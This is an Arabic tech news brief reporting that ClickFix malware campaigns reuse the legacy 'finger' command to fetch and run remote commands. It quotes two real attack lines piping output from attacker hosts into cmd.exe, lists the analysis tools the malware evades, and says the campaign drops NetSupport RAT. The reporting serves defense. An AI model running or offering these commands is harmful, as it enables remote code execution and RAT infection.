NG Solution Team
التكنولوجيا

هل يُعيد المهاجمون استخدام أمر “finger” لشن هجمات ClickFix جديدة؟

قام الفاعلون التهديديون بإعادة استخدام الأمر “finger” القديم الذي يعود لعقود مضت لتمكين تنفيذ الأوامر عن بُعد في هجمات جديدة باستخدام برمجيات ClickFix الخبيثة. تم تحديد ملف دفعي يستغل الأمر “finger root@finger.nateams[.]com” لاسترجاع وتنفيذ الأوامر عبر cmd.exe. وكشفت التحقيقات الإضافية عن حملة ClickFix تستخدم الأمر “finger Kove2@api.metrics-strange.com | cmd”، وهو مشابه لحملة أخرى تم الإبلاغ عنها. كانت هذه الاختراقات أكثر تعقيدًا، مستهدفة أدوات تحليل البرمجيات الخبيثة مثل WinDump، filemon، Procmon، x64dbg، vmmap، processlasso، Fiddler، وEverywhere. في حال عدم العثور على أدوات تحليل البرمجيات الخبيثة، يتم تحميل أرشيف ZIP يزعم أنه ملف PDF، ليقوم باستخراج حزمة NetSupport Manager RAT. وللتصدي لهذا الاستغلال، من الضروري حظر حركة المرور الصادرة إلى منفذ TCP رقم 79.

Related posts

هل سيحتوي هاتف جالاكسي زد فليب 8 على معالج إكسينوس 2600؟

فاطمة أبويوسف

ما هي صناديق الاستثمار المتداولة في الذكاء الاصطناعي الثلاثة التي ستشهد نموًا هائلًا خلال السنوات الثماني القادمة؟

محمد أبو علي

كيف تُحدث شركة ناشئة صينية ثورة في الطباعة ثلاثية الأبعاد من الأحذية إلى الروبوتات؟

خليدي أمينة

Leave a Comment

This website uses cookies to improve your experience. We assume you agree, but you can opt out if you wish. Accept More Info

Privacy & Cookies Policy